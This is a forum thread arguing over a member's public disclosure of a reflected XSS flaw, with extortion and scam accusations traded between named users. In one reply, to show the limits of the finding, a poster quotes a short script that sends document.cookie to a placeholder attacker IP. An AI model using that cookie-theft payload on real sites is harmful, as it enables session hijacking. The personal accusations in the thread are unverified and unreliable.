Author Topic: --  (Read 1052 times)
Boris007 (OP)
June 23, 2020, 02:25:02 AM
 #41

......I'm a bit confused as to what actually occurred here......
OP, Boris007: did you contact OG before posting this, in an attempt to notify the owner? If this was the case, and Og ignored it, then they had the right to publish their findings. If the server isn't vulnerable anyway, there is no offence in the actions of the OP....

So here is the gist of chat:

Me: Hi I found (XYZ) vulnerability, here is the POC.
OG: I don't run the particular site, BTW he has forwarded the message to nonakip.
Me: Is there any vulnerability bounty award ?? Can we disclose it in public??
OG: I don't run the mentioned site, so Boris007 must contact the naypalm.
Me: Thanks for clarifying that this is not your website.
I do not know who naypalm is and it seems he last logged in a week back and is very infrequent here.
So I would disclose the vulnerability to the forum(only).

--------------------------
End of PM
--------------------------

I don't know how it is extortion?? The thread Vod is a liar must change its title to Base64 (RFC 3548, RFC 4648) T2dOYXN0eQ== is a Liar.

To anyone who thinks I hate OG and created this thread for that reason, the answer is NO. I did not know who OgNasty was before a week back. I contacted him as I do with many services. He clearly says he doesn't own the site so I don't know how he comes in between. BTW thank you for notifying this to naypalm on the very first day before this post.

Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community
_______________________________________________________________________________ ________

I believe that this thread is losing its path and is now taking the path of hatred, jealousy, and personal vendetta. I would close this thread after 12 hours. Anyone who has anything other than hatred and jealousy to post is welcome.




Vod
June 23, 2020, 03:10:30 AM
 #42

So, OG lied when he cried extortion?  Not surprised.


https://nastyscam.com - featuring 13 years of OGNasty bitcoin scams     https://vod.fan - advanced image hosting - coming sooner than you think!
bob123
June 23, 2020, 09:17:37 AM
Merited by OgNasty (2), Foxpup (2)
 #43

[...]
I do not know who naypalm is and it seems he last logged in a week back and is very infrequent here.
So I would disclose the vulnerability to the forum(only).

--------------------------
End of PM
--------------------------

So because he logs in infrequently you decided to publicly disclose it?
Because you need the attention and can't wait a month or two for it to be fixed?



Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community

All you can do is obviously to use the free version of Burp Suite and make popups.
You found a reflected XSS, not a persistent one.

You like your low-level examples, I understood this already.

For example, this:
<script>
  image = new Image();
  image.src='https://[Attacker IP]:8080/?'+document.cookie;
</script>

This is only possible if the HttpOnly flag is not set.
Otherwise the cookie cannot be accessed by a script.

All you can do with that is to craft your own URL, and send it to someone to have the script executed.

How would you exploit that on such a site, where no valuable or sensitive information is being stored/entered anyway?
Short answer: You can't.


You are obviously a script kiddy, breaking laws and being a dick, just to gain some attention.
You don't understand what you actually found and don't know how this could be exploited.
